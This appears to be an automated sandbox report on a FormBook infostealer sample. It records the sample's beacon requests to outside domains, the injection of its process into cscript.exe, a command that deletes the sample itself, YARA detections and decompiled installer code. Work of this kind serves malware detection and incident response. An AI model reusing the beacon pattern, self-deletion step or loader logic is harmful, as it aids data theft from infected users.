                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  8192.168.2.549752184.168.131.24180C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:26:01.057169914 CEST9753OUTGET /bp3i/?2db=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd38qIM/2l+B&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.oceancollaborative.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:26:01.285360098 CEST9754INHTTP/1.1 302 Found
                                                                                                                  Server: nginx/1.16.1
                                                                                                                  Date: Tue, 22 Jun 2021 16:26:01 GMT
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Location: https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  9192.168.2.54975334.102.136.18080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:26:06.429832935 CEST9755OUTGET /bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.motivactivewear.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:26:06.571907043 CEST9755INHTTP/1.1 403 Forbidden
                                                                                                                  Server: openresty
                                                                                                                  Date: Tue, 22 Jun 2021 16:26:06 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 275
                                                                                                                  ETag: "60cf306c-113"
                                                                                                                  Via: 1.1 google
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                  Code Manipulations

                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  Analysis Process: WXs8v9QuE7.exe PID: 5432 Parent PID: 5752

                                                                                                                  General

                                                                                                                  Start time:18:24:02
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\WXs8v9QuE7.exe'
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:205564 bytes
                                                                                                                  MD5 hash:1F45B0E2BD669BCE49B2140373243A91
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: WXs8v9QuE7.exe PID: 5880 Parent PID: 5432

                                                                                                                  General

                                                                                                                  Start time:18:24:03
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\WXs8v9QuE7.exe'
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:205564 bytes
                                                                                                                  MD5 hash:1F45B0E2BD669BCE49B2140373243A91
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: explorer.exe PID: 3472 Parent PID: 5880

                                                                                                                  General

                                                                                                                  Start time:18:24:07
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                  Imagebase:0x7ff693d90000
                                                                                                                  File size:3933184 bytes
                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: autoconv.exe PID: 5428 Parent PID: 3472

                                                                                                                  General

                                                                                                                  Start time:18:24:31
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                                                  Imagebase:0xfa0000
                                                                                                                  File size:851968 bytes
                                                                                                                  MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: cscript.exe PID: 1632 Parent PID: 5880

                                                                                                                  General

                                                                                                                  Start time:18:24:37
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                                                                  Imagebase:0xac0000
                                                                                                                  File size:143360 bytes
                                                                                                                  MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:moderate

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: cmd.exe PID: 1864 Parent PID: 1632

                                                                                                                  General

                                                                                                                  Start time:18:24:39
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:/c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
                                                                                                                  Imagebase:0x8c0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: conhost.exe PID: 1488 Parent PID: 1864

                                                                                                                  General

                                                                                                                  Start time:18:24:40
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Chronological Activities

                                                                                                                  Disassembly

                                                                                                                  Code Analysis

                                                                                                                  Reset < >

                                                                                                                    Analysis Process: WXs8v9QuE7.exe PID: 5432 Parent PID: 5752 WXs8v9QuE7.exeCOMMON

                                                                                                                    Executed Functions

                                                                                                                    Function 004030FB, Relevance: 79.1, APIs: 26, Strings: 19, Instructions: 315stringfilecomCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 78%
                                                                                                                    			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				int _t91;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp",  &(_t56[2]));
								L25:
								_t116 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4;
											if( *0x423fd4 == 0) {
												L64:
												_t64 =  *0x423fec;
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x423f5c == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\alfons\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
											_t128 = 0x1a;
											do {
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)( *0x423f50 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\alfons\\Desktop\\WXs8v9QuE7.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)( *0x423f50 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98(0x423740, "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\alfons\\Desktop\\WXs8v9QuE7.exe\" ";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\alfons\\Desktop\\WXs8v9QuE7.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}































                                                                                                                    0x0040310c
                                                                                                                    0x00403110
                                                                                                                    0x00403118
                                                                                                                    0x0040311c
                                                                                                                    0x00403121
                                                                                                                    0x00403131
                                                                                                                    0x00403134
                                                                                                                    0x0040313b
                                                                                                                    0x00403142
                                                                                                                    0x00403142
                                                                                                                    0x0040313b
                                                                                                                    0x00403144
                                                                                                                    0x00403144
                                                                                                                    0x0040325a
                                                                                                                    0x0040325a
                                                                                                                    0x0040325a
                                                                                                                    0x0040325c
                                                                                                                    0x0040325e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004031f3
                                                                                                                    0x004031f6
                                                                                                                    0x004031fe
                                                                                                                    0x004031fe
                                                                                                                    0x00403201
                                                                                                                    0x00403206
                                                                                                                    0x00403208
                                                                                                                    0x00403208
                                                                                                                    0x00403209
                                                                                                                    0x00403209
                                                                                                                    0x0040320e
                                                                                                                    0x00403211
                                                                                                                    0x0040324a
                                                                                                                    0x0040324f
                                                                                                                    0x00403254
                                                                                                                    0x00403257
                                                                                                                    0x00403259
                                                                                                                    0x00403259
                                                                                                                    0x00403259
                                                                                                                    0x00000000
                                                                                                                    0x00403213
                                                                                                                    0x00403213
                                                                                                                    0x00403214
                                                                                                                    0x00403217
                                                                                                                    0x0040321f
                                                                                                                    0x00403222
                                                                                                                    0x00403224
                                                                                                                    0x00403224
                                                                                                                    0x00403224
                                                                                                                    0x00403224
                                                                                                                    0x00403222
                                                                                                                    0x00403229
                                                                                                                    0x0040322f
                                                                                                                    0x00403237
                                                                                                                    0x0040323a
                                                                                                                    0x0040323c
                                                                                                                    0x0040323c
                                                                                                                    0x0040323c
                                                                                                                    0x0040323c
                                                                                                                    0x0040323a
                                                                                                                    0x00403241
                                                                                                                    0x00403248
                                                                                                                    0x00403262
                                                                                                                    0x00403265
                                                                                                                    0x0040326e
                                                                                                                    0x00403273
                                                                                                                    0x00403273
                                                                                                                    0x0040327e
                                                                                                                    0x00403284
                                                                                                                    0x00403289
                                                                                                                    0x0040328b
                                                                                                                    0x004032b1
                                                                                                                    0x004032b6
                                                                                                                    0x004032c0
                                                                                                                    0x004032c7
                                                                                                                    0x004032cb
                                                                                                                    0x00403332
                                                                                                                    0x00403332
                                                                                                                    0x00403337
                                                                                                                    0x0040333d
                                                                                                                    0x00403341
                                                                                                                    0x00403456
                                                                                                                    0x0040345c
                                                                                                                    0x004034f9
                                                                                                                    0x004034f9
                                                                                                                    0x004034fe
                                                                                                                    0x00403501
                                                                                                                    0x00403503
                                                                                                                    0x00403503
                                                                                                                    0x0040350b
                                                                                                                    0x0040350b
                                                                                                                    0x0040346b
                                                                                                                    0x00403474
                                                                                                                    0x00403476
                                                                                                                    0x0040347b
                                                                                                                    0x0040347d
                                                                                                                    0x0040347f
                                                                                                                    0x00403481
                                                                                                                    0x00403483
